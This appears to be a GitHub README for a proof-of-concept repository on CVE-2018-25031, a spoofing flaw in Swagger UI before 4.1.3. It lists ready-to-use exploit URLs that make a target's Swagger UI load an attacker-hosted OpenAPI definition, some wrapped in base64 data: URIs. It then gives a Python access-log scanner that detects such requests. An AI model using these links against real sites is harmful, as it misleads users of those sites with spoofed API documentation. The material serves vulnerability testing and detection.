https://github.com/mathis2001/cve-2018-25031


# CVE-2018-25031

CVE-2018-25031 exploit tests

Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.

## HowTo

Find the Swagger UI documentation endpoint and append the `configUrl` parameter pointing to test.json, or the `url` parameter pointing to test.yaml:
```
https://exemple.com/?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json
https://exemple.com/?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui/index.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/api/swagger/index.html?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json
https://exemple.com/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0Lmpzb24iCn0=
https://exemple.com/?url=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0LnlhbWwiCn0=
https://exemple.com/swagger-ui/index.html?url=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0LnlhbWwiCn0=
https://exemple.com/swagger-ui.html?url=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0LnlhbWwiCn0=
https://exemple.com/api/swagger/index.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0Lmpzb24iCn0=
```
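
For the defending side, the following added example (not part of this repository) scans web access-log lines for Swagger UI requests whose `url` or `configUrl` parameter points at a foreign host or an inline `data:` URI. The log lines, the host `api.example.com` and the function names `classify` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAMS = ("url", "configUrl")  # query parameters named in the README
REQUEST_RE = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (hosts and IPs are placeholders).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /swagger-ui/index.html?url=/v3/api-docs HTTP/1.1" 200 1024',
    '203.0.113.8 - - [01/Jan/2024:10:00:05 +0000] "GET /swagger-ui/index.html?url=https://defs.example.net/test.yaml HTTP/1.1" 200 1024',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /api/swagger/index.html?configUrl=data:text/html;base64,e30= HTTP/1.1" 200 1024',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 512',
]

def classify(value, own_host):
    """Return a reason string if the value would load a foreign definition, else None."""
    target = urlsplit(value.strip())
    scheme = target.scheme.lower()
    if scheme == "data":
        return "inline data: URI"
    if scheme in ("http", "https") or value.startswith("//"):
        host = (target.hostname or "").lower()
        if host != own_host.lower():
            return f"external host {host}"
    return None  # relative path or definition served by our own host

def scan(lines, own_host):
    """Return (path, parameter, reason) for every suspicious request line."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group(1))
        # parse_qs percent-decodes values, so encoded URLs are caught too.
        for name, values in parse_qs(parts.query).items():
            if name not in PARAMS:
                continue
            for value in values:
                reason = classify(value, own_host)
                if reason:
                    findings.append((parts.path, name, reason))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "api.example.com"):
        print(finding)
```

Hits against a deployment running Swagger UI before 4.1.3 indicate that a crafted link of the kind listed above was opened.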

## Screenshots

![image](https://github.com/mathis2001/CVE-2018-25031/assets/40497633/b8267eec-332d-477f-a6e1-5087ab15f607)
![tempsnip](https://github.com/mathis2001/CVE-2018-25031/assets/40497633/b5104f39-c3cb-4d5d-8496-06c31337b3d7)